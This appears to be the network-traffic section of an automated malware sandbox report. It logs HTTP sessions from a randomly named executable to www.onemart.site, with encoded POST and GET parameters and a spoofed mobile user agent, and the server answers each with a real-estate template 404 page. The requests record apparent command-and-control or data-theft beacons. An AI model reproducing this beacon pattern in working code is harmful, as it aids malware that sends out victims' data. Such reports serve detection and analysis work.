                                                                            Nov 5, 2024 15:23:23.026648045 CET212INData Raw: 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 43 75 73 74 6f 6d 69 7a 65 64 20 42 6f 6f 74 73 74 72 61 70 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65
                                                                            Data Ascii: " rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link href="css/style.css" rel="stylesheet">
                                                                            Nov 5, 2024 15:23:23.026660919 CET1236INData Raw: 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 2d 78 78 6c 20 62 67 2d 77 68 69 74 65 20 70 2d 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 53 70 69
                                                                            Data Ascii: </head><body> <div class="container-xxl bg-white p-0"> ... Spinner Start --> <div id="spinner" class="show bg-white position-fixed translate-middle w-100 vh-100 top-50 start-50 d-flex align-items-center justify-con
                                                                            Nov 5, 2024 15:23:23.026921034 CET1236INData Raw: 20 20 20 20 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 22 20 69 64 3d 22 6e 61 76 62 61
                                                                            Data Ascii: </button> <div class="collapse navbar-collapse" id="navbarCollapse"> <div class="navbar-nav ms-auto"> <a href="index.html" class="nav-item nav-link">Home</a>
                                                                            Nov 5, 2024 15:23:23.026936054 CET1236INData Raw: 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 3e 54 65 73 74 69 6d 6f 6e 69 61 6c 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 34 30 34 2e 68
                                                                            Data Ascii: ss="dropdown-item">Testimonial</a> <a href="404.html" class="dropdown-item active">404 Error</a> </div> </div> <a href="contact.htm
                                                                            Nov 5, 2024 15:23:23.026949883 CET1236INData Raw: 20 20 20 20 20 20 20 20 3c 2f 6f 6c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6e 61 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                            Data Ascii: </ol> </nav> </div> <div class="col-md-6 animated fadeIn"> <img class="img-fluid" src="img/header.jpg" alt=""> </div> </div>
                                                                            Nov 5, 2024 15:23:23.027790070 CET1236INData Raw: 20 33 3c 2f 6f 70 74 69 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 65 6c 65 63 74 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                            Data Ascii: 3</option> </select> </div> <div class="col-md-4"> <select class="form-select border-0 py-3">
                                                                            Nov 5, 2024 15:23:23.027806044 CET1236INData Raw: 31 20 74 65 78 74 2d 70 72 69 6d 61 72 79 22 3e 3c 2f 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 64 69 73 70 6c 61 79 2d 31 22 3e 34 30 34 3c 2f 68 31 3e 0d 0a 20 20 20 20
                                                                            Data Ascii: 1 text-primary"></i> <h1 class="display-1">404</h1> <h1 class="mb-4">Page Not Found</h1> <p class="mb-4">Were sorry, the page you have looked for does not exist in o
                                                                            Nov 5, 2024 15:23:23.027820110 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 6c 69 67 68 74 20 62 74 6e 2d 73 6f 63 69 61 6c 22 20 68 72 65 66 3d 22 22 3e 3c 69 20 63 6c 61 73 73 3d
                                                                            Data Ascii: <a class="btn btn-outline-light btn-social" href=""><i class="fab fa-twitter"></i></a> <a class="btn btn-outline-light btn-social" href=""><i class="fab fa-facebook-f"></i></a>
                                                                            Nov 5, 2024 15:23:23.028564930 CET1236INData Raw: 68 35 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 20 67 2d 32 20 70 74 2d 32 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                            Data Ascii: h5> <div class="row g-2 pt-2"> <div class="col-4"> <img class="img-fluid rounded bg-light p-1" src="img/property-1.jpg" alt="">
                                                                            Nov 5, 2024 15:23:23.031691074 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d
                                                                            Data Ascii: </div> </div> <div class="col-lg-3 col-md-6"> <h5 class="text-white mb-4">Newsletter</h5> <p>Dolor amet sit justo amet elitr clita ipsum


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.455594209.74.95.29804324C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 5, 2024 15:23:24.890872002 CET10898OUTPOST /frpa/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.onemart.site
                                                                            Origin: http://www.onemart.site
                                                                            Connection: close
                                                                            Content-Length: 10300
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.onemart.site/frpa/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Raw: 7a 68 6c 3d 37 36 69 66 41 73 73 2f 6f 70 44 71 62 30 6d 6e 4f 6c 46 6b 63 6e 70 59 41 76 71 79 48 61 52 2f 55 4b 4a 53 4d 35 53 47 47 4e 49 6f 41 78 47 70 4f 32 4a 64 59 36 66 54 77 74 6d 55 74 2b 43 36 54 62 41 77 38 7a 5a 74 76 36 30 6b 41 6d 72 5a 64 38 69 41 4d 76 6b 6f 68 39 50 42 6e 64 66 77 52 57 74 62 33 38 61 43 4b 79 71 4e 74 51 4b 73 62 32 7a 63 56 31 75 70 2b 74 73 44 56 70 78 6d 67 4b 7a 77 64 52 4c 52 41 53 73 2f 4f 6d 4c 49 33 44 73 4e 59 61 64 52 64 32 72 37 51 62 58 53 30 77 6e 36 4f 36 4e 53 72 36 34 65 54 75 43 38 7a 4d 34 4c 6a 73 6b 71 42 6d 6b 5a 39 34 2b 46 37 71 38 30 73 39 64 30 74 44 63 6e 59 4d 6b 6e 37 4c 79 36 74 63 4e 66 42 33 2b 38 6c 34 38 46 4e 49 64 37 4b 4c 48 36 62 68 57 58 49 33 66 43 30 45 42 61 50 69 66 36 67 55 71 43 33 74 69 6e 79 4c 50 71 46 42 68 6f 48 4a 42 30 72 6d 50 34 49 33 58 6e 6f 4a 34 6e 75 66 72 33 6d 4b 39 47 43 4c 51 66 50 49 6d 64 34 4b 71 4b 6c 30 6d 4b 38 6b 4c 78 53 36 58 69 79 33 70 54 47 61 6d 57 72 44 35 75 30 70 32 31 34 6c 30 7a 59 41 [TRUNCATED]
                                                                            Data Ascii: zhl=76ifAss/opDqb0mnOlFkcnpYAvqyHaR/UKJSM5SGGNIoAxGpO2JdY6fTwtmUt+C6TbAw8zZtv60kAmrZd8iAMvkoh9PBndfwRWtb38aCKyqNtQKsb2zcV1up+tsDVpxmgKzwdRLRASs/OmLI3DsNYadRd2r7QbXS0wn6O6NSr64eTuC8zM4LjskqBmkZ94+F7q80s9d0tDcnYMkn7Ly6tcNfB3+8l48FNId7KLH6bhWXI3fC0EBaPif6gUqC3tinyLPqFBhoHJB0rmP4I3XnoJ4nufr3mK9GCLQfPImd4KqKl0mK8kLxS6Xiy3pTGamWrD5u0p214l0zYAJCG9rMM0Xb5EzG/GyqTJw/dfYzehjma5KKZOptwSOLTeF1tVcsEQF7R2A0Mln/7GApbsXQCAeWGxgXOP9albfDJOt/UIM5FcW0rK2xPzs6rA1rQMNyK2VuNGemzfhEV9OMQJ8FeTHD01gQhEG67ChDCZRb6qUejhab81kQQfXZ7BHw/V21mid7Mh5Ss/3SAER/K+VqoqeN+5xuVSJv/ExacBvqdPxpvsm5PuliwFKe8JEyOkUTkYKHMN/ZUX/El30h2XLpYfBwPZ5/g+P3E2DcnHdV5pCCTI11a+9laV6ORBnwMJ4/azqQA7zHWOPjhlOTR1ZLpWAlskLrGq4lo1aAzqrBtWPMmmejWVO6jacsQLeRzjMY+sQNIAiC7uNY7g5ESuoik/dgnWPDgHcS9hWBi2mnknx3uTkXLQfWHJHzVDgSHVttMaVWtUnjPgAEDMhRLXYHZ1Mej/t7WRdY9KA4zT9RIk2Fnf0LTzc1OsFR3AYnBsXW6D8mK8tbNDis7iFQvuDWXBmwMS05Kp1Ms8SSpyORTn7vNkNmtCY1jPJqzTcFLzkLL4mPPMPYACWMsuWC1eirTvYZTWawtmz9Vh25anaM0BwQcQA5ftcEvpfZGbaj70XjZYFaLnrxK1IAfMiPGvRNB49EeHvzQrVJ9sKwFqdOKncr1VeR [TRUNCATED]
                                                                            Nov 5, 2024 15:23:25.564204931 CET1236INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 05 Nov 2024 14:23:25 GMT
                                                                            Server: Apache
                                                                            Content-Length: 13928
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]
                                                                            Nov 5, 2024 15:23:25.564311028 CET1236INData Raw: 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 43 75 73 74 6f 6d 69 7a 65 64 20 42 6f 6f 74 73 74 72 61 70 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65
                                                                            Data Ascii: " rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link href="css/style.css" rel="stylesheet"></head><body> <div cl
                                                                            Nov 5, 2024 15:23:25.564326048 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 72 22 20 64 61
                                                                            Data Ascii: </a> <button type="button" class="navbar-toggler" data-bs-toggle="collapse" data-bs-target="#navbarCollapse"> <span class="navbar-toggler-icon"></span> </button>
                                                                            Nov 5, 2024 15:23:25.564815044 CET1236INData Raw: 22 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 20 61 63 74 69 76 65 22 20 64 61 74 61 2d 62 73 2d 74 6f 67 67 6c 65 3d 22 64 72 6f 70 64 6f 77 6e 22 3e 50 61 67 65 73 3c 2f 61 3e 0d 0a 20 20 20
                                                                            Data Ascii: " class="nav-link dropdown-toggle active" data-bs-toggle="dropdown">Pages</a> <div class="dropdown-menu rounded-0 m-0"> <a href="testimonial.html" class="dropdown-item">Testimonial<
                                                                            Nov 5, 2024 15:23:25.564829111 CET848INData Raw: 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 62 72 65 61 64 63 72 75 6d 62 2d 69 74 65 6d 22 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 50 61 67 65 73 3c 2f 61 3e 3c 2f
                                                                            Data Ascii: > <li class="breadcrumb-item"><a href="#">Pages</a></li> <li class="breadcrumb-item text-body active" aria-current="page">404 Error</li> </ol>
                                                                            Nov 5, 2024 15:23:25.565268993 CET1236INData Raw: 73 3d 22 63 6f 6c 2d 6d 64 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74
                                                                            Data Ascii: s="col-md-4"> <input type="text" class="form-control border-0 py-3" placeholder="Search Keyword"> </div> <div class="col-md-4">
                                                                            Nov 5, 2024 15:23:25.565282106 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 32 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                            Data Ascii: </div> <div class="col-md-2"> <button class="btn btn-dark border-0 w-100 py-3">Search</button> </div> </div> </div> </div>
                                                                            Nov 5, 2024 15:23:25.565293074 CET1236INData Raw: 66 61 64 65 49 6e 22 20 64 61 74 61 2d 77 6f 77 2d 64 65 6c 61 79 3d 22 30 2e 31 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 70 79 2d 35 22 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                            Data Ascii: fadeIn" data-wow-delay="0.1s"> <div class="container py-5"> <div class="row g-5"> <div class="col-lg-3 col-md-6"> <h5 class="text-white mb-4">Get In Touch</h5>
                                                                            Nov 5, 2024 15:23:25.565304995 CET1236INData Raw: 69 6e 6b 73 3c 2f 68 35 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 6c 69 6e 6b 20 74 65 78 74 2d 77 68 69 74 65 2d 35 30 22 20 68 72 65 66 3d 22 22 3e 41
                                                                            Data Ascii: inks</h5> <a class="btn btn-link text-white-50" href="">About Us</a> <a class="btn btn-link text-white-50" href="">Contact Us</a> <a class="btn btn-link text-white-50"
                                                                            Nov 5, 2024 15:23:25.566135883 CET848INData Raw: 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                            Data Ascii: div> <div class="col-4"> <img class="img-fluid rounded bg-light p-1" src="img/property-4.jpg" alt=""> </div> <div class="co
                                                                            Nov 5, 2024 15:23:25.569329023 CET1236INData Raw: 72 20 65 73 74 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 6d 78 2d 61 75 74 6f 22 20 73 74 79 6c 65 3d 22
                                                                            Data Ascii: r est.</p> <div class="position-relative mx-auto" style="max-width: 400px;"> <input class="form-control bg-transparent w-100 py-3 ps-4 pe-5" type="text" placeholder="Your email">


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.455609209.74.95.29804324C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 5, 2024 15:23:27.431590080 CET537OUTGET /frpa/?X8Rx1=znhhIbB8nN&zhl=24K/DZkmoc7bHzW+Clhod14EO+WVCLplL8BuA7PGHf8qDHCdDnlgU8fv6Zi4ouLCHtMfxhN5psYeEWHEa5SDdP5UtNzqgNLmQXsJ8/qLKwWQm26aR0vbL2E= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Host: www.onemart.site
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Nov 5, 2024 15:23:28.155177116 CET1236INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 05 Nov 2024 14:23:28 GMT
                                                                            Server: Apache
                                                                            Content-Length: 13928
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]
                                                                            Nov 5, 2024 15:23:28.155280113 CET1236INData Raw: 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 43 75 73 74 6f 6d 69 7a 65 64 20 42 6f 6f 74 73 74 72 61 70 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e
                                                                            Data Ascii: arousel.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link href="css/style.css" rel="stylesheet"></head><bod
                                                                            Nov 5, 2024 15:23:28.155294895 CET1236INData Raw: 61 6b 61 61 6e 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 6e 61 76
                                                                            Data Ascii: akaan</h1> </a> <button type="button" class="navbar-toggler" data-bs-toggle="collapse" data-bs-target="#navbarCollapse"> <span class="navbar-toggler-icon"></span> </button
                                                                            Nov 5, 2024 15:23:28.155759096 CET1236INData Raw: 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 22 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 20 61 63 74 69 76 65 22 20 64 61 74 61 2d 62 73 2d 74 6f 67 67 6c 65 3d 22 64 72 6f 70 64 6f 77 6e 22
                                                                            Data Ascii: <a href="#" class="nav-link dropdown-toggle active" data-bs-toggle="dropdown">Pages</a> <div class="dropdown-menu rounded-0 m-0"> <a href="testimonial.html" class="dropdown-ite
                                                                            Nov 5, 2024 15:23:28.155771017 CET1236INData Raw: 23 22 3e 48 6f 6d 65 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 62 72 65 61 64 63 72 75 6d 62 2d 69 74 65 6d 22 3e 3c 61 20 68 72 65 66 3d
                                                                            Data Ascii: #">Home</a></li> <li class="breadcrumb-item"><a href="#">Pages</a></li> <li class="breadcrumb-item text-body active" aria-current="page">404 Error</li> </ol>
                                                                            Nov 5, 2024 15:23:28.155790091 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 31 22 3e 50 72 6f 70 65 72 74 79 20 54 79 70 65 20 31 3c 2f 6f 70 74 69 6f 6e 3e 0d 0a 20 20
                                                                            Data Ascii: <option value="1">Property Type 1</option> <option value="2">Property Type 2</option> <option value="3">Property Type 3</option>
                                                                            Nov 5, 2024 15:23:28.156426907 CET1236INData Raw: 2e 31 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73
                                                                            Data Ascii: .1s"> <div class="container text-center"> <div class="row justify-content-center"> <div class="col-lg-6"> <i class="bi bi-exclamation-triangle display-1 text-primary">
                                                                            Nov 5, 2024 15:23:28.156440020 CET1236INData Raw: 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 32 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 70 68 6f 6e 65 2d 61 6c 74 20 6d 65 2d 33 22 3e 3c 2f 69 3e 2b 30 31 32 20 33 34 35 20 36 37 38 39 30 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20
                                                                            Data Ascii: <p class="mb-2"><i class="fa fa-phone-alt me-3"></i>+012 345 67890</p> <p class="mb-2"><i class="fa fa-envelope me-3"></i>info@example.com</p> <div class="d-flex pt-2">
                                                                            Nov 5, 2024 15:23:28.156456947 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 6c 69 6e 6b 20 74 65 78 74 2d 77 68 69 74 65 2d 35 30 22 20 68 72 65 66 3d 22 22 3e 54 65 72 6d 73 20 26 20 43 6f 6e 64 69 74 69 6f 6e 3c 2f 61 3e 0d 0a 20 20 20
                                                                            Data Ascii: <a class="btn btn-link text-white-50" href="">Terms & Condition</a> </div> <div class="col-lg-3 col-md-6"> <h5 class="text-white mb-4">Photo Gallery</h5>
                                                                            Nov 5, 2024 15:23:28.157272100 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20
                                                                            Data Ascii: </div> <div class="col-4"> <img class="img-fluid rounded bg-light p-1" src="img/property-6.jpg" alt=""> </div> <
                                                                            Nov 5, 2024 15:23:28.162250996 CET1236INData Raw: 3c 2f 61 3e 2c 20 41 6c 6c 20 52 69 67 68 74 20 52 65 73 65 72 76 65 64 2e 20 0d 0a 09 09 09 09 09 09 09 0d 0a 09 09 09 09 09 09 09 3c 21 2d 2d 2f 2a 2a 2a 20 54 68 69 73 20 74 65 6d 70 6c 61 74 65 20 69 73 20 66 72 65 65 20 61 73 20 6c 6f 6e 67
                                                                            Data Ascii: </a>, All Right Reserved. .../*** This template is free as long as you keep the footer authors credit link/attribution link/backlink. If you'd like to use the template without the footer authors credit link/attribution


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.455644136.143.186.12804324C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
